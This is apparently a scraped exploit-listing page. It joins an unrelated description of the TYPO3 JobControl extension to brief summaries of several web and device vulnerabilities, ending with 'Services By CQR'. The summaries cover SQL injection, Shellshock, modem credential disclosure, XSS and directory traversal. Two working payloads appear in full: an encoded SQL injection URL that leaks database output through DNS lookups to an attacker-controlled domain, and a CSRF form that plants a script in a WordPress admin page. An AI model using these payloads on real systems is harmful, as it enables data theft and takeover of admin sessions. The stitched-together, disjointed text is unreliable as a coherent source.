JobControl (dmmjobcontrol) is a TYPO3 extension for showing jobs ('vacancies') on your website. It provides a list- and detail view and the ability to search and apply for jobs. It can even make RSS feeds of your joblist. It works with html templates so it's easy to configure how the extension will look for your site. The list can be shown as a 'paginated list', including a page-browser. The extension itself is multi-lingual, at this moment English, Danish, Polish, German, Russian and Dutch are included. The best feature however is that multi-lingual jobs are fully supported too, so you can provide a translation for a job if you have a multi-lingual site. JobControl uses MM-relation tables for regions, branches, sectors etc. This means that for every new site, you can make a new list of branches to use. They are not hardcoded and don't require any TypoScript to set up. JobControl is very easy to set up, with good default templates that can be styled to your needs using css stylesheets. It's very powerful and flexible too with lots of configuration options for advanced users.
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29%29%29%29
This exploit discloses the ISP credentials of Modem Nucom ADSL R5000UNv2. The vulnerable file is guidewan.html located at http://gateway/telecom_GUI/guidewan.html. The bug is ISP usr+pwd disclosure. The exploit is written in Perl and uses LWP::UserAgent, HTTP::Request and MIME::Base64 modules.
This module sends the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.
Bash Specially-crafted Environment Variables Code Injection Vulnerability is a vulnerability in GNU Bash, which allows attackers to execute arbitrary commands by specifying environment variables. This vulnerability was discovered in September 2014 and affects versions of Bash prior to 4.3. It is also known as Shellshock. The exploit is executed by sending a specially crafted HTTP request to a vulnerable server, which contains a malicious command in the User-Agent header. The command is then executed on the server.
This vulnerability is triggered when extra code is added to the end of bash functions stored in environment variables. This can allow an attacker to inject malicious code into the environment, which can then be executed by the vulnerable system.
Using a specially crafted HTTP request, it is possible to exploit a lack in the validation of the “item_id[0]” and “item_id[]” input parameters of cart.php page. Successful exploitation of the vulnerabilities results in read sensitive data from the database and, in some cases, execute administration operation on the database or issue commands to the operating system. Using a specially crafted HTTP request, it is possible to exploit a lack in the neutralization of multiple pages output which includes the user submitted content. Successful exploitation of the vulnerabilities, results in the execution of arbitrary HTML and script code in the user’s browser in the context of the victim user's session trough a “Reflected XSS”. Using a specially crafted HTTP request, it is possible to redirect the normal browsing of users to a malicious site by modifying untrusted URL input in Referer HTTP header parameter in index.php, cart.php, msg.php and page.php pages. Successful exploitation of the vulnerabilities results in phishing scam, user credential theft, malware dissemination.
A directory traversal vulnerability in OSClass before 3.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a render action to oc-admin/index.php.
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript). <form method="POST" action="http://localhost/wp-admin/options-general.php?page=login_widget_afo"> <input type="text" name="custom_style_afo" value="</textarea><script>alert(1)</script>"> <input type="text" name="option" value="login_widget_afo_save_settings"> <input type="submit"> </form>
A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
Services By CQR